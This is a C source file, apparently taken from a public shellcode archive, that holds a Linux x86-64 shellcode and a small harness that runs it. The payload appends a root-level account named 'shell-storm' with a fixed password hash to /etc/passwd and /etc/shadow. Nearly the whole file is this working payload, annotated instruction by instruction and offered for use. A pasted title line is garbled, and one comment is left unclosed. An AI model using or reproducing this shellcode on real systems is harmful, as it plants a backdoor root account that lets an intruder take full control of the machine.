/*Title: Linux/x86-64 - Add root user with password - 390 bytesDate: 2010

1. /*
2. Title: Linux/x86-64 - Add root user with password - 390 bytes
3. Date: 2010-06-20
4. Tested: Archlinux x86_64 k2.6.33
5.  
6. Author: Jonathan Salwan
7. Web: http://shell-storm.org | http://twitter.com/jonathansalwan
8.  
9. ! Dtabase of shellcodes http://www.shell-storm.org/shellcode/
10.  
11.  
12.  
13. Add root user with password:
14. - User: shell-storm
15. - Pass: leet
16. - id : 0
17. */
18.  
19. #include <stdio.h>
20.  
21.  
22. char *SC =
23. /* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND, 01204) */
24.  
25. "\x48\xbb\xff\xff\xff\xff\xff\x73\x77\x64" /* mov $0x647773ffffffffff,%rbx */
26. "\x48\xc1\xeb\x28" /* shr $0x28,%rbx */
27. "\x53" /* push %rbx */
28. "\x48\xbb\x2f\x65\x74\x63\x2f\x70\x61\x73" /* mov $0x7361702f6374652f,%rbx */
29. "\x53" /* push %rbx */
30. "\x48\x89\xe7" /* mov %rsp,%rdi */
31. "\x66\xbe\x41\x04" /* mov $0x441,%si */
32. "\x66\xba\x84\x02" /* mov $0x284,%dx */
33. "\x48\x31\xc0" /* xor %rax,%rax */
34. "\xb0\x02" /* mov $0x2,%al */
35. "\x0f\x05" /* syscall */
36.  
37. /* write(3, "shell-storm:x:0:0:shell-storm.or"..., 46) */
38.  
39. "\x48\xbf\xff\xff\xff\xff\xff\xff\xff\x03" /* mov $0x3ffffffffffffff,%rdi */
40. "\x48\xc1\xef\x38" /* shr $0x38,%rdi */
41. "\x48\xbb\xff\xff\x2f\x62\x61\x73\x68\x0a" /* mov $0xa687361622fffff,%rbx */
42. "\x48\xc1\xeb\x10" /* shr $0x10,%rbx */
43. "\x53" /* push %rbx */
44. "\x48\xbb\x67\x3a\x2f\x3a\x2f\x62\x69\x6e" /* mov $0x6e69622f3a2f3a67,%rbx */
45. "\x53" /* push %rbx */
46. "\x48\xbb\x73\x74\x6f\x72\x6d\x2e\x6f\x72" /* mov $0x726f2e6d726f7473,%rbx */
47. "\x53" /* push %rbx */
48. "\x48\xbb\x30\x3a\x73\x68\x65\x6c\x6c\x2d" /* mov $0x2d6c6c6568733a30,%rbx */
49. "\x53" /* push %rbx */
50. "\x48\xbb\x6f\x72\x6d\x3a\x78\x3a\x30\x3a" /* mov $0x3a303a783a6d726f,%rbx */
51. "\x53" /* push %rbx */
52. "\x48\xbb\x73\x68\x65\x6c\x6c\x2d\x73\x74" /* mov $0x74732d6c6c656873,%rbx */
53. "\x53" /* push %rbx */
54. "\x48\x89\xe6" /* mov %rsp,%rsi */
55. "\x48\xba\xff\xff\xff\xff\xff\xff\xff\x2e" /* mov $0x2effffffffffffff,%rdx */
56. "\x48\xc1\xea\x38" /* shr $0x38,%rdx */
57. "\x48\x31\xc0" /* xor %rax,%rax */
58. "\xb0\x01" /* mov $0x1,%al */
59. "\x0f\x05" /* syscall */
60.  
61. /* close(3) */
62.  
63. "\x48\xbf\xff\xff\xff\xff\xff\xff\xff\x03" /* mov $0x3ffffffffffffff,%rdi */
64. "\x48\xc1\xef\x38" /* shr $0x38,%rdi */
65. "\x48\x31\xc0" /* xor %rax,%rax */
66. "\xb0\x03" /* mov $0x3,%al */
67. "\x0f\x05" /* syscall */
68.  
69. /* Xor */
70.  
71. "\x48\x31\xdb" /* xor %rbx,%rbx */
72. "\x48\x31\xff" /* xor %rdi,%rdi */
73. "\x48\x31\xf6" /* xor %rsi,%rsi */
74. "\x48\x31\xd2" /* xor %rdx,%rdx */
75.  
76. /* open("/etc/shadow", O_WRONLY|O_CREAT|O_APPEND, 01204) */
77.  
78. "\x48\xbb\xff\xff\xff\xff\xff\x64\x6f\x77" /* mov $0x776f64ffffffffff,%rbx */
79. "\x48\xc1\xeb\x28" /* shr $0x28,%rbx */
80. "\x53" /* push %rbx */
81. "\x48\xbb\x2f\x65\x74\x63\x2f\x73\x68\x61" /* mov $0x6168732f6374652f,%rbx */
82. "\x53" /* push %rbx */
83. "\x48\x89\xe7" /* mov %rsp,%rdi */
84. "\x66\xbe\x41\x04" /* mov $0x441,%si */
85. "\x66\xba\x84\x02" /* mov $0x284,%dx */
86. "\x48\x31\xc0" /* xor %rax,%rax */
87. "\xb0\x02" /* mov $0x2,%al */
88. "\x0f\x05" /* syscall *
89.  
90. /* write(3, "shell-storm:$1$reWE7GM1$axeMg6LT"..., 59) */
91.  
92. "\x48\xbf\xff\xff\xff\xff\xff\xff\xff\x03" /* mov $0x3ffffffffffffff,%rdi */
93. "\x48\xc1\xef\x38" /* shr $0x38,%rdi */
94. "\x48\xbb\xff\xff\xff\xff\xff\x3a\x3a\x0a" /* mov $0xa3a3affffffffff,%rbx */
95. "\x48\xc1\xeb\x28" /* shr $0x28,%rbx */
96. "\x53" /* push %rbx */
97. "\x48\xbb\x34\x37\x37\x38\x3a\x3a\x3a\x3a" /* mov $0x3a3a3a3a38373734,%rbx */
98. "\x53" /* push %rbx */
99. "\x48\xbb\x5a\x30\x55\x33\x4d\x2f\x3a\x31" /* mov $0x313a2f4d3355305a,%rbx */
100. "\x53" /* push %rbx */
101. "\x48\xbb\x73\x2f\x50\x64\x53\x67\x63\x46" /* mov $0x4663675364502f73,%rbx */
102. "\x53" /* push %rbx */
103. "\x48\xbb\x61\x78\x65\x4d\x67\x36\x4c\x54" /* mov $0x544c36674d657861,%rbx */
104. "\x53" /* push %rbx */
105. "\x48\xbb\x65\x57\x45\x37\x47\x4d\x31\x24" /* mov $0x24314d4737455765,%rbx */
106. "\x53" /* push %rbx */
107. "\x48\xbb\x6f\x72\x6d\x3a\x24\x31\x24\x72" /* mov $0x722431243a6d726f,%rbx */
108. "\x53" /* push %rbx */
109. "\x48\xbb\x73\x68\x65\x6c\x6c\x2d\x73\x74" /* mov $0x74732d6c6c656873,%rbx */
110. "\x53" /* push %rbx */
111. "\x48\x89\xe6" /* mov %rsp,%rsi */
112. "\x48\xba\xff\xff\xff\xff\xff\xff\xff\x3b" /* mov $0x3bffffffffffffff,%rdx */
113. "\x48\xc1\xea\x38" /* shr $0x38,%rdx */
114. "\x48\x31\xc0" /* xor %rax,%rax */
115. "\xb0\x01" /* mov $0x1,%al */
116. "\x0f\x05" /* syscall */
117.  
118. /* close(3) */
119.  
120. "\x48\xbf\xff\xff\xff\xff\xff\xff\xff\x03" /* mov $0x3ffffffffffffff,%rdi */
121. "\x48\xc1\xef\x38" /* shr $0x38,%rdi */
122. "\x48\x31\xc0" /* xor %rax,%rax */
123. "\xb0\x03" /* mov $0x3,%al */
124. "\x0f\x05" /* syscall */
125.  
126. /* _exit(0) */
127.  
128. "\x48\x31\xff" /* xor %rdi,%rdi */
129. "\x48\x31\xc0" /* xor %rax,%rax */
130. "\xb0\x3c" /* mov $0x3c,%al */
131. "\x0f\x05"; /* syscall */
132.  
133.  
134. int main(void)
135. {
136. fprintf(stdout,"Length: %d\n",strlen(SC));
137. (*(void(*)()) SC)();
138. return 0;
139. }